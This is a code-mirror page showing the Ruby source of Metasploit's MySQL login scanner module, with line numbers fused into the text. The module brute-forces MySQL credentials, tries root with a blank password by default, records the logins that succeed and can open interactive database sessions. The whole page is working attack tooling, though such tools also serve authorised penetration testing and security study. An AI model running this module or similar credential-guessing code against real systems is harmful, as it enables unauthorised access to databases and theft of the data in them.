CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/mysql/mysql_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/credential_collection'6require 'metasploit/framework/login_scanner/mysql'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::MYSQL10include Msf::Auxiliary::Report11include Msf::Auxiliary::AuthBrute12include Msf::Auxiliary::Scanner13include Msf::Sessions::CreateSessionOptions14include Msf::Auxiliary::CommandShell15include Msf::Auxiliary::ReportSummary1617def initialize(info = {})18super(update_info(info,19'Name' => 'MySQL Login Utility',20'Description' => 'This module simply queries the MySQL instance for a specific user/pass (default is root with blank).',21'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],22'License' => MSF_LICENSE,23'References' =>24[25[ 'CVE', '1999-0502'] # Weak password26],27# some overrides from authbrute since there is a default username and a blank password28'DefaultOptions' =>29{30'USERNAME' => 'root',31'BLANK_PASSWORDS' => true,32'CreateSession' => false33}34))3536register_options(37[38Opt::Proxies,39OptBool.new('CreateSession', [false, 'Create a new session for every successful login', false])40])4142if framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)43add_info('New in Metasploit 6.4 - The %grnCreateSession%clr option within this module can open an interactive session')44else45options_to_deregister = %w[CreateSession]46end47deregister_options(*options_to_deregister)48end4950# @return [FalseClass]51def create_session?52if framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)53datastore['CreateSession']54else55false56end57end5859def target60[rhost,rport].join(":")61end6263def run64results = super65logins = results.flat_map { |_k, v| v[:successful_logins] }66sessions = results.flat_map { |_k, v| v[:successful_sessions] }67print_status("Bruteforce completed, #{logins.size} #{logins.size == 1 ? 'credential was' : 'credentials were'} successful.")68return results unless framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)6970if create_session?71print_status("#{sessions.size} MySQL #{sessions.size == 1 ? 'session was' : 'sessions were'} opened successfully.")72else73print_status('You can open an MySQL session with these credentials and %grnCreateSession%clr set to true')74end75results76end7778def run_host(ip)79begin80if mysql_version_check("4.1.1") # Pushing down to 4.1.1.81cred_collection = build_credential_collection(82username: datastore['USERNAME'],83password: datastore['PASSWORD']84)8586scanner = Metasploit::Framework::LoginScanner::MySQL.new(87configure_login_scanner(88cred_details: cred_collection,89stop_on_success: datastore['STOP_ON_SUCCESS'],90bruteforce_speed: datastore['BRUTEFORCE_SPEED'],91connection_timeout: 30,92max_send_size: datastore['TCP::max_send_size'],93send_delay: datastore['TCP::send_delay'],94framework: framework,95framework_module: self,96use_client_as_proof: create_session?,97ssl: datastore['SSL'],98ssl_version: datastore['SSLVersion'],99ssl_verify_mode: datastore['SSLVerifyMode'],100ssl_cipher: datastore['SSLCipher'],101local_port: datastore['CPORT'],102local_host: datastore['CHOST']103)104)105106successful_logins = []107successful_sessions = []108scanner.scan! do |result|109credential_data = result.to_h110credential_data.merge!(111module_fullname: self.fullname,112workspace_id: myworkspace_id113)114if result.success?115credential_core = create_credential(credential_data)116credential_data[:core] = credential_core117create_credential_login(credential_data)118119print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"120successful_logins << result121122if create_session?123begin124successful_sessions << session_setup(result)125rescue ::StandardError => e126elog('Failed to setup the session', error: e)127print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"128result.connection.close unless result.connection.nil?129end130end131else132invalidate_login(credential_data)133vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"134end135end136137else138vprint_error "#{target} - Unsupported target version of MySQL detected. Skipping."139end140rescue ::Rex::ConnectionError, ::EOFError => e141vprint_error "#{target} - Unable to connect: #{e.to_s}"142end143{ successful_logins: successful_logins, successful_sessions: successful_sessions }144end145146# Tmtm's rbmysql is only good for recent versions of mysql, according147# to http://www.tmtm.org/en/mysql/ruby/. We'll need to write our own148# auth checker for earlier versions. Shouldn't be too hard.149# This code is essentially the same as the mysql_version module, just less150# whitespace and returns false on errors.151def mysql_version_check(target="5.0.67") # Oldest the library claims.152begin153s = connect(false)154data = s.get155disconnect(s)156rescue ::Rex::ConnectionError, ::EOFError => e157raise e158rescue ::Exception => e159vprint_error("#{rhost}:#{rport} error checking version #{e.class} #{e}")160return false161end162offset = 0163l0, l1, l2 = data[offset, 3].unpack('CCC')164return false if data.length < 3165length = l0 | (l1 << 8) | (l2 << 16)166# Read a bad amount of data167return if length != (data.length - 4)168offset += 4169proto = data[offset, 1].unpack('C')[0]170# Error condition171return if proto == 255172offset += 1173version = data[offset..-1].unpack('Z*')[0]174report_service(:host => rhost, :port => rport, :name => "mysql", :info => version)175short_version = version.split('-')[0]176vprint_good "#{rhost}:#{rport} - Found remote MySQL version #{short_version}"177int_version(short_version) >= int_version(target)178end179180# Takes a x.y.z version number and turns it into an integer for181# easier comparison. Useful for other things probably so should182# get moved up to Rex. Allows for version increments up to 0xff.183def int_version(str)184int = 0185begin # Okay, if you're not exactly what I expect, just return 0186return 0 unless str =~ /^[0-9]+\x2e[0-9]+/187digits = str.split(".")[0,3].map {|x| x.to_i}188digits[2] ||= 0 # Nil protection189int = (digits[0] << 16)190int += (digits[1] << 8)191int += digits[2]192rescue193return int194end195end196197# @param [Metasploit::Framework::LoginScanner::Result] result198# @return [Msf::Sessions::MySQL]199def session_setup(result)200return unless (result.connection && result.proof)201202my_session = Msf::Sessions::MySQL.new(result.connection, { client: result.proof, **result.proof.detect_platform_and_arch })203merge_me = {204'USERPASS_FILE' => nil,205'USER_FILE' => nil,206'PASS_FILE' => nil,207'USERNAME' => result.credential.public,208'PASSWORD' => result.credential.private209}210211start_session(self, nil, merge_me, false, my_session.rstream, my_session)212end213end214215216